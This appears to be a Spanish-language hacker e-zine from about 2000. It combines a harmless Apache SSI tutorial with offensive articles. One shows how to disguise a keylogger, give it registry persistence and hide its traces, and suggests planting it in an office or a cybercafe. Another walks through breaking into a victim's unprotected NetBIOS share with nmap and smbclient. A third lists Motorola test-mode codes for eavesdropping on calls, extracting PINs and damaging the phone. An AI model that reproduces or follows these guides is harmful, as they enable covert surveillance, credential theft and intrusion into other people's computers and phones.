  Le quitamos el comentario para activarlo


  NOTA: el # significa que es un comentario. Si esta linea no aparece en
  el archivo httpd.conf entonces agregala manualmente.


  Para  que  el  servidor  reconozca  la  extension  .shtml  nos vamos a
  /etc/httpd/conf/srm.conf y quitamos el comentario a las lineas:

# Quitamos el comentario de las dos lineas Siguientes
AddType text/html .shtml
AddHandler server-parsed .shtml

  Bueno  ya  podemos  empezar e programar en SSI e insertarlo en nuestro
  Site, aqui les dejo un grupito de tags que pueden utlizar:

DATE_GMT <!--#echo var="DATE_GMT" --> <br>
DATE_LOCAL <!--#echo var="DATE_LOCAL" --> <br>
DOCUMENT_NAME <!--#echo var="DOCUMENT_NAME" --> <br>
DOCUMENT_PATH_INFO <!--#echo var="DOCUMENT_PATH_INFO" --> <br>
DOCUMENT_ROOT <!--#echo var="DOCUMENT_ROOT" --> <br>
DOCUMENT_URI <!--#echo var="DOCUMENT_URI" --> <br>
LAST_MODIFIED <!--#echo var="LAST_MODIFIED" --> <br>
GATEWAY_INTERFACE <!--#echo var="GATEWAY_INTERFACE" --> <br>
HTTP_ACCEPT <!--#echo var="HTTP_ACCEPT" --> <br>
HTTP_ACCEPT_CHARSET <!--#echo var="HTTP_ACCEPT_CHARSET" --> <br>
HTTP_ACCEPT_ENCODING <!--#echo var="HTTP_ACCEPT_ENCODING" --> <br>
HTTP_ACCEPT_LANGUAGE <!--#echo var="HTTP_ACCEPT_LANGUAGE" --> <br>
HTTP_CONNECTION <!--#echo var="HTTP_CONNECTION" --> <br>
HTTP_COOKIE <!--#echo var="HTTP_COOKIE" --> <br>
HTTP_HOST <!--#echo var="HTTP_HOST" --> <br>
HTTP_IF_MODIFIED_SINCE <!--#echo var="HTTP_IF_MODIFIED_SINCE" --> <br>
HTTP_PRAGMA <!--#echo var="HTTP_PRAGMA" --> <br>
HTTP_USER_AGENT <!--#echo var="HTTP_USER_AGENT" --> <br>
PATH <!--#echo var="PATH" --> <br>
QUERY_STRING <!--#echo var="QUERY_STRING" --> <br>
REMOTE_ADDR <!--#echo var="REMOTE_ADDR" --> <br>
REMOTE_HOST <!--#echo var="REMOTE_HOST" --> <br>
REMOTE_PORT <!--#echo var="REMOTE_PORT" --> <br>
REQUEST_METHOD <!--#echo var="REQUEST_METHOD" --> <br>
SCRIPT_FILENAME <!--#echo var="SCRIPT_FILENAME" --> <br>
SERVER_ADMIN <!--#echo var="SERVER_ADMIN" --> <br>
SERVER_NAME <!--#echo var="SERVER_NAME" --> <br>
SERVER_PORT <!--#echo var="SERVER_PORT" --> <br>
SERVER_PROTOCOL <!--#echo var="SERVER_PROTOCOL" --> <br>
SERVER_SIGNATURE <!--#echo var="SERVER_SIGNATURE" --> <br>
SERVER_SOFTWARE <!--#echo var="SERVER_SOFTWARE" --> <br>
SCRIPT_NAME <!--#echo var="SCRIPT_NAME" --> <br>
USER_NAME <!--#echo var="USER_NAME" --> <br>


  Ejemplo en el index de un site:


<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="Author" content="kl0nk Manson">
   <title>Ejemplo








kl0nk!





        


        













  En  el  ejemplo  anterior  en  mi index.shtml, el evalua el idioma del
  usuario  que  se  esta conectando a mi web, si su idioma es en ESPA~OL
  entonces el le muestra  una  pagina  en  Espa~ol  y si su idioma es en
  Ingles  entonces le muestra  la  pagina  en  Ingles. Aparte el incluye
  un al final del site un pedazo de  codigo (HTML) que  esta  almacenado
  en  el archivo "pie.inc".

  Aqui esta el ejemplo de pie.inc




 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


Direccion remota:  
[]


Hora local: 



  Otro ejemplo puede ser:

[...resto de la pagina...]

        Administracion

[...resto de la pagina...]


  Esto  quiere  decir que el evalua la direccion IP si corresponde con el
  grupo   192.168.1.xxx   entonces  el  mostrara  el  link  a la  web  de
  administracion (esto es de  gran  utilidad, ya que si tu pagina esta en
  la IneT los usuarios no autorizados no podran ver este Link).

Algunas Variables que se puede usar con SSI:

Variables:$DATE_GMT
Variables:$DATE_LOCAL
Variables:$DOCUMENT_NAME
Variables:$DOCUMENT_PATH_INFO
Variables:$DOCUMENT_ROOT
Variables:$DOCUMENT_URI
Variables:$LAST_MODIFIED
Variables:$GATEWAY_INTERFACE
Variables:$HTTP_ACCEPT
Variables:$HTTP_ACCEPT_CHARSET
Variables:$HTTP_ACCEPT_ENCODING
Variables:$HTTP_ACCEPT_LANGUAGE
Variables:$HTTP_CONNECTION
Variables:$HTTP_COOKIE
Variables:$HTTP_HOST
Variables:$HTTP_IF_MODIFIED_SINCE
Variables:$HTTP_PRAGMA
Variables:$HTTP_USER_AGENT
Variables:$PATH
Variables:$QUERY_STRING
Variables:$REMOTE_ADDR
Variables:$REMOTE_HOST
Variables:$REMOTE_PORT
Variables:$REQUEST_METHOD
Variables:$SCRIPT_FILENAME
Variables:$SERVER_ADMIN
Variables:$SERVER_NAME
Variables:$SERVER_PORT
Variables:$SERVER_PROTOCOL
Variables:$SERVER_SIGNATURE
Variables:$SERVER_SOFTWARE
Variables:$SCRIPT_NAME
Variables:$USER_NAME

Codigo de Idiomas:

afrikaans               af
albanian                sq
basque                  eu
bulgarian               bg
byelorussian            be
catalan                 ca
chinese                 zh
chinese/China           zh-CN
chinese/Taiwan          zh-TW
croatian                hr
czech                   cs
danish                  da
dutch                   nl
dutch/Belgium           bl-BE
english                 en
english/UK              en-GB
english/USA             en-US
fearoese                fo
finnish                 fi
french                  fr
french/belgium          fr-BE
french/canada           fr-CA
french/france           fr-FR
french/switzerland      fr-CH
galician                gl
german                  de
german/austria          de-AT
german/germanny         de-DE
german/switzerland      de-CH
greek                   el
hungarian               hu
icelandic               is
indonesian              id
irish                   ga
italian                 it
japanese                ja
korean                  ko
macedonia               mk
norwegian               no
polish                  pl
portuguese              pt
portuguese/brazil       pt-BR
romanian                ro
russian                 ru
scots gaelic            gd
serbian                 sr
slovak                  sk
slovenian               sl
spanish                 es
spanish/argentina       es-AR
spanish/colombia        es-CO
spanish/mexico          es-MX
spanish/spain           es-ES
spanish/Venezuela       es-VE
swedish                 sv
turkish                 tr
ukrainian               uk


  Bueno  yo  creo  que  con esto ustedes puedan defenderse un poco, para
  mayor informacion puedes visitar el site de apache 
  que alli podras encontrar mucha informacion acerca de esto.

  Enjoy ;)

----------------------------------------------------------
- Mr. kl0nk Manson <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >                    -
- Grupo 0ri0n - Agente 6                                 -
- Hackers Venezuela - http://hven.com.ve/                -
---------------------------------------------------------- 
- Dime con que S.O trabajas.... y te dire quien eres  :) -
----------------------------------------------------------


   ͻ
͹ Keylog! 2.5 ͹[C]apon[E]
   ͼ

                    Keyloger 2.5 by [C]apon[E] el [M]afios[O]
                             Para Micro$oft GUIndows

Autor del Keyloger
=============================================================================
Enhancing Creator of KeyLog! (2.5): KiD ViD.
Original Creator of KeyLog 1.x By: Mike Ellis.
Disclaimer: The authors will not be responsible for anything!
=============================================================================

  Yo igual.... No me hago responsable de tus actos ok?
                     
  En  si  un  keyloger  lo  que hace es guardar en un archivo, todas las
  pulsaciones  de cada tecla del teclado, o mejor dicho graba las teclas
  pulsadas  en  un  archivo (ojo no todas por lo menos shift+i = I no la
  graba  si no que aparece "i"). Este programa es muy util y sencillo de
  usar  pero... tienes  que  saber  como usarlo bien, lo que se necesita
  para poder hacer esto es:

    KeyLoger (2.5 en mi caso) 
    Editor Hexadecimal
    Self-Extractor de WinZip (opcional)
    Notepad
    Muy importante: vbrun300.dll y qpro200.dll en C:\windows\system
    y ... Razonamiento

Configuracion

  En  si en este keyloger hay ciertos errores o mejor dicho opciones por
  defecto. Empecemos ... ya? ya tienes tu keyloger vago eh?.. es facil
  de conseguir man.

  El paquete viene asi por defecto:

    qpro200.dll

    Keylog!.reg         Archivo  de  registro  de  Win  para  que cuando
                        arranque  la  Computadora  se inicie el keyloger

    Keylog!.txt         Readme

    Keylog!.exe         Sera el keyloger =o)


  Ok.. unas  de  las  cosas  que estan mal hechas es que cuando le damos
  ctrl+alt+supr   nos   aparece   -kidvid-  ... piensa  si  alguien  con
  conocimientos medios ve esto ... lo quita imediatamente...

  Abre  tu editor hexadecimal y busca -KIDVID- o K,Kid,KID esta cerca de
  algo que dice:

.......-KIDVID-.
......VBRUN300..

  Y  cambiala  por  MsSystray  o MsConfig, Winconfi o lo que sea... pero
  tienes  que  saber  usar un editor HexaDecimal... Si no sabes trata de
  que  tu  palabra  ocupe  solo  8  caracteres  como la original =) y en
  MAYUSCULAS igual ... pero ojo solo el -KIDVID-.

  Otra  de  las  cosa que puedes hacer es cambiar la carpeta por defecto
  donde  se  guardaran  las  teclas  registradas  que es C:\windows\temp
  que  son  los  archivos  que te interesan cambiala a la que tu quieras
  haciendo lo mismo buscando en el editor hexadecimal C:\ y cambiala.

  Okis  ahora  tienes  que  cambiar el archivo de registro para lo antes
  mencionado... este  permite  que cuando inicies la maquina se inice el
  keyloger.

  Por defecto viene asi:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"KiD ViD"="C:\Windows\Temp\KeyLog!.exe"

  Cambialo a:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"MsConfig"="C:\Windows\ve mas abajo\Msconfig.exe"


  Otro  de  los malo es que este viene en el archivo winzip .exe que fue
  distribuido para que se instale en C:\windows\temp.

  Ah te voy a decir algo, una vez puse un keyloger en la ofi de mi madre
  entonces  vino  un  tipo  ahi  (y que tecnico =) y  borro  todo lo que
  habia en C:\windows\temp y me jo... porque me borro el .exe que era el
  keyloger.

  Y  cambiale  el  nombre  de Keyloger.exe a lo que quieras por lo menos
  MsConfig.exe.

  Ok ahora toma tu self-extractor y configura para que sea en la carpeta
  que  mas  te  guste, te  sugiero C:\WINDOWS\SYSTEM\VIEWERS u otra bien
  oculta, o  sea  que  nadie  toque  eso  y ponle atributo OCULTO (click
  derecho/propiedades  en  el  .exe  del  keyloger  y  pones oculto). Te
  sugiero que configures algo como asi:

    .reg (te  permite  que  haga  la  config  para  que cuando inicie la
     maquina,  inicie  el  keyloger)  este  ponlo   en   el   escritorio
     (C:\windows\escritorio) pero recuerda... borralo cuando lo ejecutes
     ya que te descubriran!

    .exe (en la carpeta que escogiste).

USO

  Ya  esta listo no? reboot a tu maquina ahora agarra y ve si se activo
  tu keyloger Control+Alt+Supr en mi caso MsConfig ahora trabaja normal.
  Reinicia.

  Ya?  mete  en  la   carpeta  que elegiste por defecto C:\windows\temp
  o la que hallas elegido y ve ahi unos archivos algo como 08180620.00w.
  esto  quiero  decir  que: Fue  creado el 18 de Junio del 2000 pero  te
  sugiero  que  lo  abras  en el EDIT del DOS ya que se ve mejor!  Estas
  listo ahora diviertete! ;) Idea: Ponlo en un cybercafe =)

  Lo ultimo que  te puedo decir es que lo pruebes en tu casa... y luego
  quitalo  si quieres ... solo borra el .exe y la cadena en el registro
  de Windows.

---------------------------------------------------------
Bueno cualquier duda escribeme a: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
---------------------------------------------------------


   ͻ
͹ Explotando NetBIOS desde Linux ͹DrAk0
   ͼ

  Bueno  gente  aqui  va  mi  primer  articulo para el e-zine asi que me
  disculpan  lo sencillo que pueda estar pero argo si les digo, FUNCIONA
  MUY BIEN ;) y eso es lo importante...

  Este  doc  lo  hago  porque  mas  de una vez estaba en un canal de IRC
  chateando  de  lo  mas  normal y me decian: "pana estas en windows?".
  para que?  -decia yo-  Para que te metas en tal pc porque yo estoy en
  Linux, el  tiene  el 139 abierto .... -entonces yo decia- , pero que?
  desde  linux  no se puede?... y saben que!. SI, si se puede y eso es
  lo que vamos a hacer ahora mismo :-).

  Lo   primero   que   debemos   tener   es   bien  configurado  nuestro
  /etc/smb.conf. Bueno  la  idea es que lo podamos entrar en esa maquina
  ya  asi  que les pongo un modelo de smb.conf aqui, pero les recomiendo
  que  se  lean  el  SAMBA-HOWTO  para  que  lo  pongan  al  pelo  a  su
  preferencia...

----CUT----
 [global]
 workgroup = erguamache.com
   server string = Linux Power >;)
;   hosts allow = 192.168.1. 192.168.2. 127.
   log file = /var/log/samba.%m
   max log size = 50
   security = user
;   password server = 
;  encrypt passwords = yes
;   include = /usr/local/samba/lib/smb.conf.%m
   socket options = TCP_NODELAY
;   interfaces = 192.168.12.2/24 192.168.13.2/24
;   local master = no
;   os level = 33
;   domain master = yes
;   preferred master = yes
;   domain controller = 
;   domain logons = yes
;   logon script = %m.bat
;   logon script = %U.bat
;   logon path = \%L\Profiles\%U
;   wins support = yes
;   wins server = w.x.y.z
;   wins proxy = yes
   dns proxy = no
[homes]
   comment = Home Directories
   browseable = no
   writable = yes

; [netlogon]
;   comment = Network Logon Service
;   path = /usr/local/samba/lib/netlogon
;   guest ok = yes
;   writable = no
;   share modes = no

   guest ok = no
   writable = no
   printable = yes

;[tmp]
;   comment = Temporary file space
;   path = /tmp
;   read only = no
;   public = yes

;[public]
;   comment = Public Stuff
;   path = /home/samba
;   public = yes
;   writable = yes
;   printable = no
;   write list = @staff

;[fredsprn]
;   comment = Fred's Printer
;   valid users = fred
;   path = /homes/fred
;   printer = freds_printer
;   public = no
;   writable = no
;   printable = yes

;[fredsdir]
;   comment = Fred's Service
;   path = /usr/somewhere/private
;   valid users = fred
;   public = no
;   writable = yes
;   printable = no
;[pchome]
;  comment = PC Directories
;  path = /usr/pc/%m
;  public = no
;  writable = yes
;[public]
;   path = /usr/somewhere/else/public
;   public = yes
;   only guest = yes
;   writable = yes
;[myshare]
;   comment = Mary's and Fred's stuff
;   path = /usr/somewhere/shared
;   valid users = mary fred
;   public = no
;   writable = yes
;   printable = no
;   create mask = 0765
----CUT----

  Si  crees  que  no  tienes  bien tu smb.conf comparalo con este si no,
  bueno  ya  sabes, cut  paste, OJO aqui si piensas poner a funcionar el
  smb.conf  para  tu red pues este no te va a servir, bueno por lo menos
  las impresoras...

  Ya  sabes SAMBA-HOWTO contigo... bueno una vez teniendo en smb.conf en
  buen  estado  pues buscamos a ver si tenemos el smbclient que va a ser
  nuestra arma, probamos de la siguiente manera...

  Escribimos esto en una shell:

---------------------
linuxserver:~# smbclient -L 1
Added interface ip=192.168.1.1 bcast=192.168.1.255 nmask=255.255.255.0
error connecting to 0.0.0.1:139 (Network is unreachable)
Connection to 1 failed
linuxserver:~#        
---------------------

  Si  esto  nos  aparece, estamos  listos, si  no  bueno  ve buscando en
  internet el smbclient a ver si lo encuentras ;)...

  Bueno  ahora  si  ya  que sabemos que tenemos todo lo que necesitamos,
  manos a la obra. Ok.

1.- Por supuesto tener la IP de la PC a la cual queremos entrar
2.- A~adimos  esa IP a nuestro archivo /etc/hosts de la siguiente manera
    pueden usar cualquier editor de texto mi preferencia es vi.
    a~adimos asi:

----
127.0.0.1	localhost
192.168.1.1	 	linuxserver.sagitario.org linuxserver
xxx.xxx.xxx.xx          el.dominio.loquesea   sualiasqui
#ejemplo real
192.168.1.2             resp.sagitario.org resp
----

  Ojo... el dominio lo podemos agarrar de la la siguiente manera, usando
  nuestro querido amigo NMAP haciendole un scan a nuestra IP amiga ;)

  Asi de esta forma:

---
linuxserver:~# nmap -sS -O  192.168.1.2
 
Starting nmap V. 2.02 by Fyodor (
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 , www.insecure.org/nmap/)
Interesting ports on resp.sagitario.org (192.168.1.2):
Port    State       Protocol  Service
139     open        tcp        netbios-ssn
 
TCP Sequence Prediction: Class=trivial time dependency
                         Difficulty=1 (Trivial joke)
Remote operating system guess: Windows NT4 / Win95 / Win98
 
Nmap run completed -- 1 IP address (1 host up) scanned in 11 seconds
linuxserver:~#                                                       
---

  Como  podemos  ver  en  la  segunda  linea  nos aparece el dominio que
  buscamos Interesting ports on -->resp.sagitario.org<--- (192.168.1.2):
  y  asi  vemos  que  efectivamente tiene su netbios abiertico solo para
  nosotros Bueno eso esperamos.

3.- Una  vez  teniendo  el  archivo  /etc/hosts  definido  con la ip que
    queremos probamos si esta correcto de la siguiente forma:

ping resp (es decir ping elalias ;))

  Deberiamos obtener algo como esto:

---
linuxserver:~# ping resp
PING  victima.sagitario.org (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=255 time=0.7 ms
64 bytes from 192.168.1.1: icmp_seq=1 ttl=255 time=0.5 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=255 time=0.5 ms  
---

  Bueno si nos sale esto ya estamos seguro que la victima esta alli y la
  tenemos en la mira jeje...

4.- Ahora  nos  toca ver que es lo que esta compartiendo esa maquina que
    queremos agarrar haciendo lo siguiente.

smbclient -L aliasvictima

  Esto nos dira que comparte la victima.
  Al  principio  nos  pedira  un  password y le daremos enter, eso no nos
  detiene.

---
linuxserver:~# smbclient -L resp
Added interface ip=192.168.1.1 bcast=192.168.1.255 nmask=255.255.255.0
Password:
 
        Sharename      Type      Comment
        ---------      ----      -------
        C              Disk
        IPC$           IPC       Comunicacion remota entre procesos
 
        Server               Comment
        ---------            -------
 
        Workgroup            Master
        ---------            -------
linuxserver:~#            
---

  Aqui vemos que comparte C: justamente lo que estabamos buscando >;) 

  Lo  unico  que  tenemos que ligar ahora es que no tenga password, y si
  lo tiene nos  judimus, pero si tenemos ese pass lo podemos usar (no se
  si eso se puede desde el windows)

  Bueno esperemos que no tenga pass... Si es asi lo que nos que hacer es
  probarlo tratando de entrar haciendo esto:

smbclient \\lamaquina\elrecurso

  En  este  caso  la  maquina  es  resp y el recurso es C como lo mostre
  anteriormente:

---
linuxserver:~# smbclient \\resp\c
Added interface ip=192.168.1.1 bcast=192.168.1.255 nmask=255.255.255.0
Password:         
---

  En este  punto  nos  pide un password, pues todavia tenemos esperanzas
  si esta maquina no tiene asegurado su recurso con password (lo cual es
  un  error fatal)  bastara con darle un simple enter y deberiamos estar
  adentro.

---
linuxserver:~# smbclient \\resp\c
Added interface ip=192.168.1.1 bcast=192.168.1.255 nmask=255.255.255.0
Password:[enteraqui]
smb: \>  
---

  Este  prompt  "smb: \>" nos  quiere decir que ESTAMOS ADENTRO SI!!! lo
  penetramos. YEAH!!

  Y si  no  es  que  tiene un  pass, y si lo  tenemos solo se lo ponemos
  cuando lo pida, y si no lo tienes busca como agarrarlo ;).

...........

  Bueno ya adentro.

  En este  prompt  "smb: \>"  bastara  con  darles  los comandos que nos
  interesen.

  Aqui  les  anexo  los comandos  que  mas usaremos, si quieres mas pues
  busca ;):

ls = listar los archivos y directorios
get = traer un archivo de esa maquina
put = subir (meter) un archivo para esa maquina
rm = borrar archivo
rename = renombrar 
pwd = saber en que carpeta estas
mkdir = crear carpeta
rmdir = borrar carpeta
h = ayuda (muy importante jejejeje)


  Bueno  con  eso  les  dejo  las  herramientas para  que  puedan seguir
  disfrutando  del  poder  de LINUX y no tener que pasarte para win para
  explotar el Netbios.

  Espero que les sirva de algo, pues a mi si que me servido...

  Y queria  darle  las  gracias al pana Supreme, pues el es el que me ha
  empujado y  me  ha  ayudado estimulandome con Linux y el hack desde el
  principio, jeje cuando era mas lamer que Bilo puf que horrible... pero
  bueno  gracias a Dios que ya sali de alli, tambien ar pana Combel, por
  sus  asesorias y  consejos. Y tambien  las gracias der pana [C]apon[E]
  por toda  su  colaboracion  y por permitir  que lo  penetrara, juy (su
  maquina) no jeje para todas estas pruebas... bueno se despide..

DrAk0 der Valle

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  
ICQ UIN# 52211219
Linux.Counter. 
# 158165.

   ͻ
͹  HaCk MoToRoLa  ͹KaDiLaC
   ͼ

  Hola a todos, kien no ha kerido escuchar otras conversaciones de otras
  personas ke usan celular, o kien no ha kerido desblokear un celular y
  hacer llamadas a espaldas del dueo XDDD, o mas bien, descubrir las
  claves de acceso de los celulares motorola para despues usarlo de forma
  productiva y cobrarle a las personas ke se le olvidan las famosas claves
  de 3 o 6 digitos del motorola, bueno aki les dare una forma sencilla de
  hacerlo.

  Aki explicar en ke consiste cada opcin, como interferir una llamada,
  como escuchar y hablar, cambiar los codigos de pass del usuario (menos
  el de entrada a su TELBOX o contestadora), por supuesto el celular ke
  se puede hacer esto es cualkier tipo de Motorola no importa ke linea de
  telfono tenga.

  Bueno lo ke se debe hacer es pulsar sucesivamente esta linea de comando:

  - primero encender (PWD)XDDDDD

  Bueno despues de encender pulsar:

  (FCN)(0)(0)(*)(*)(8)(3)(7)(8)(6)(6)(3)(3)(STO) y vuala!!!!!! (no se como
  se escribe XDD)

  Aki tamos en el modo  test o modo de prueba de dicho celular,

   Ke es el modo test o prueba ?

  Bueno el modo prueba nos permite a nosotros, poder escuchar, transmitir,
  averiguar datos del celular, scannear y unas cuantas cosas mas con
  nuestro telfono, es importante aclarar ke el celular no tiene pq
  estar "en regla" para ke funcione el modo test o sea ke puede estar
  recien comprado y de = forma va a funcionar.....
  En este modo prcticamente es el modo de programacin del celular
  donde puedes cambiarle tu nmero de fone, pass del celular tanto 3
  como 6 digitos (no se puede averiguar el pass del telbox o el buzn
  de la linea y eso ke he tratado pero no lo he encontrado) cambiarlo
  de tipo de banda como banda A (caso venezuela: TELCEL) o banda B
  (mismo caso: Movilnet), telcel y movilnet son dos empresas
  diferentes de telefona celular en venezuela...

-/-/-/-/-/IMPORTANTE-/-/-/-/-/-/-IMPORTANTE/-/-/-/-/-/-/IMPORTANTE-/-/-/-
OJO no me hago responsable si se jode tu celular  por estar inventando...
-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-

  Sigo:
  Despus de realizar el codigo de acceso al modo test saldra en la
  pantalla del celular esto: "330 1190010110" y si lo dejas asi cambia
  de digitos como si fuera un reloj (no se para ke es eso, pero si lo
  averiguar me lo puedes pasar a la siguiente direccin
  
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 ), luego pulsarn (#)(1)(1)(9)(9)(1)(#)(0)(8)(#)
  (esto es para SOLO ESCUCHAR mas no HABLAR...) :o~~~~

  Donde 11991 es un canal y el 08 es para ke puedas encender el modo
  receptor (se pone como un radio ke no transmite).

  Si kieres en vez de solo escuchar, mandar tambien mensaje de voz,
  aparte de lo antes mencionado debes pulsar (#)(0)(5)(#)(1)(0)(#)

  Pero si tus intenciones son otras te recomiendo la opcin (#)(5)(5)
  (#) ke es la ke te da toda la informacin del celular, como nmero
  de telfono, claves de 3 y 6 dgitos, si el telfono tiene uno o dos
  nmeros, etc

  Aki tienes otra opcin muy peligrosa ke te puede kemar el chip del
  celular trayendo como consecuencia ke cambies de celular, ya ke es bien
  peluo conseguir ese tipo de chip (por lo menos as es el caso de
  Venezuela), esta opcion es (#)(9)(9)(#)(0)(1)(#)

  De todas formas aki les mando un poco de las opciones ke tiene la
  programacin del celular motorola

===========================================================================
  COMANDO                             FUNCION
===========================================================================
   01#                       Resetea el celular
---------------------------------------------------------------------------
   02#                       Muestra el status actual del radio.
---------------------------------------------------------------------------
   04#                       Inicializa la unidad con los seteos default:
                               /    Carrier off.
                              |     Atenuador de RF al mximo poder.
                              |     Receptor de audio anulado.
              seteos        < |     Transmisor de audio anulado.
              default         |     Tono de sealizacin apagado.
                              |     Reseteo del WatchDog Timer.
                              |     DTMF y tonos de audio apagados.
                               \    Capsula Telefnica encendida.
---------------------------------------------------------------------------
   05#                       Transmisin de portadora activa.
---------------------------------------------------------------------------
   06#                       Transmisin de portadora apagada.
---------------------------------------------------------------------------
   07#                       Receptor apagado. (audio)
---------------------------------------------------------------------------
   08#                       Receptor encendido (audio)
---------------------------------------------------------------------------
   09#                       Transmisin de audio apagada.
---------------------------------------------------------------------------
   10#                       Transmisin de audio encendido.
---------------------------------------------------------------------------
   11xxx#                    Selecciona un canal dado por xxx.
---------------------------------------------------------------------------
   12x#                      Setea poder del ekipo dado por x (0=max, 7=min)
---------------------------------------------------------------------------
   13#                       Ekipo apagado.
---------------------------------------------------------------------------
   14#                       Activacin de un tono de 10 Khz.
---------------------------------------------------------------------------
   15#                       Apagado del tono de 10 Khz.
---------------------------------------------------------------------------
   19#                       Muestra la versin del soft utilizado.
---------------------------------------------------------------------------
   25x#                      SAT tone donde si x=0 el tono es de 5970 Hz.
                             si x=1 el tono es de 6000 Hz.
                             si x=2 el tono es de 6030 Hz.
---------------------------------------------------------------------------
   26#                       SAT TONE apagado.
---------------------------------------------------------------------------
   27#                       Transmite datos del celular. (CUIDADO!)
---------------------------------------------------------------------------
   28#                       Activa un tono de 1150 Hz.
---------------------------------------------------------------------------
   29#                       Desactiva el tono de 1150 Hz.
---------------------------------------------------------------------------
   30#                       Activa un tono de 770 Hz.
---------------------------------------------------------------------------
   31#                       Desactiva el tono de 770 Hz.
---------------------------------------------------------------------------
   32#                       Borra todos los timers y reseteos ke el usuario
                             haya programado.
---------------------------------------------------------------------------
   33x#                      Enciende tono de DTMF donde x puede ser 0-9,* y
                             #.
---------------------------------------------------------------------------
   34#                       Tono(s) de DTMF apagado(s).
---------------------------------------------------------------------------
   36xxx#                    Activa el scanner de canales (Ojo! esta opcin
                             algunos modelos no la tienen) donde xxx es la
                             pausa entre cada canal dada en milisegundos.
                             (pulsar "#" para parar el scaneo)
---------------------------------------------------------------------------
   38#                       Muestra el ESN en hexadecimal.
---------------------------------------------------------------------------
   45#                       Muestra el RSSI actual.
---------------------------------------------------------------------------
   46#                       Muestra el Timer de llamada aculmulativo.
---------------------------------------------------------------------------
   47x#                      Setea nivel de receptor de audio de 0 a 7.
---------------------------------------------------------------------------
   48#                       Side Tone On.
---------------------------------------------------------------------------
   49#                         "   "   Off.
---------------------------------------------------------------------------
   55#                       Programacin de Customer/System Information
                             Al entrar 55#, aparece  el mensaje "U 5 '"
                             entramos 55# de nuevo, y podremos cambiar
                             parmetros programables del telfono un
                             numero infinito de veces (para mi es el mas
                             importante)
---------------------------------------------------------------------------
   58#                       Compandor On
---------------------------------------------------------------------------
   59#                       Compandor Off.
---------------------------------------------------------------------------
   61#                       Transferencia del nmero de serie (solo para
                             dtm/minitac)
---------------------------------------------------------------------------
   62#                       Enciende alarma de llamada.
---------------------------------------------------------------------------
   63#                       Desactiva alarma de llamada.
---------------------------------------------------------------------------
   99#                       Sobrecarga el chip del celular
---------------------------------------------------------------------------

   ͻ
͹ Llaves PGP 
   ͼ

  Hemos  decidido  el hecho de que incluir las llaves PGP de cada uno de
  los  integrantes  de  HVen  recarga  bastante  el  tama~o  del  E-Zine
  a~adiendo unos "kilitos" de sobra, por lo que en...

    http://www.hven.com.ve/public-keys

  Puedes  encontrar  las llaves PGP que buscas. Si aun no tienes el PGP,
  recomendamos su uso y se puede encontrar en...

    http://www.pgp.com   --> Version Windows
    http://www.gnupg.org --> Version Linux


   ͻ
͹ Sobre las colaboraciones 
   ͼ

  Todo  tipo  de  colaboracion enviada para ser publicada al E-Zine sera
  bienvenida siempre y cuando se cumpla con lo siguiente:

    + Que sea un articulo de invencion propia. No intentes enga~ar a los
      editores con articulos que sean copiados de otras personas.

    + Las  traducciones  son  bienvenidas. Siempre y cuando menciones la
      fuente  de la cual ha sido extraido el articulo, con su respectivo
      autor.

    + El articulo, si ha de llevar acentos, e~es y demas arte ASCII debe
      ser escrito  con  el  Charset de MS-DOS, para ello recomendamos el
      uso del EDIT del DOS o en caso de que utilice Linux, el editor JED
      o el PICO.

    + Se  debe  respetar  un  ancho de linea de 72 caracteres, para ello
      recomendamos  evitar el uso del  Notepad  de  Windows, utiliza  el
      EDIT del DOS que es mas eficiente.

    + Evita   las   faltas   de   ortografia, utiliza  un  lenguaje  mas
      "coloquial", y  tambien  evita las faltas intencionales (comos los
      `ke', `komo') ya  que rebajan  la  calidad  de  los  articulos. Si
      eres  una  persona "poco aventajada" en el campo de la ortografia,
      pasale un corrector.

      Envia cualquier tipo de colaboraciones a la siguiente direccion
                            <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >

   ͻ
͹ HVEN RC5 DES 
   ͼ

    Proyecto Bovine RC5-64
  
  Aun sigue en pie el proyecto Bovine para romper el algoritmo RC5 de 64
  bits, creado por  RSA Labs y los clientes por la gente de distributed.
  
  Como  recompensa  por  romper  el  algoritmo  se  pagaran US00 a la
  persona que logre  dar con una clave correcta para romper el algoritmo
  y otros US00 al equipo al cual pertenezca dicha persona.
  
  El  metodo   utilizado   es  fuerza  bruta, o  sea, para  aclaraciones
  sugeridas, el cliente  va  probando  clave  por  clave hasta hallar la
  correcta, es un metodo extremadamente LENTO.
  
    Me interesa ... como me uno?
    
  Para  unirte  debes bajar  el  cliente  que  corresponda  a tu sistema
  operativo, lo  hay  para casi todos... Linux, BSD, Win32, DOS y muchos
  mas. Lo puedes conseguir en:
  
  http://n0cgi.distributed.net/cgi/select.cgi
  
  Debes instalarlo  y  configurarlo  para  que  apunte a tu direccion de
  correo electronico.
  
  Luego debes  esperar  aproximadamente un dia o hasta que se actualicen
  las estadisticas (Todos los dias  a las 0:00 GMT, o sea, a  las  20:00
  aqui en Venezuela) en la direccion web:

  http://stats.distributed.net
  
  Te buscas  por  la direccion  de correo  que colocaste, apareceras con
  unos pocos  bloques.  Luego  pides  que  te  envien un  password  a tu
  direccion de correo electronico, con dicho password podras:
  
 - Crear un Team.
 - Unirte a un Team.
 - Y muchas cosas interesantes mas.
  
    Team HVen
    
  Puedes  unirte a nuestro  team RC5, luego  de que tengas tu password y
  tus estadisticas  en  distributed.net, vas  a stats  y buscas en teams
  "Hven", aparecera  cierta  informacion, un  logo de HVen =D y un  link
  que dice  "i want  to join  this team",  dirigete  ahi  y  colocas  tu
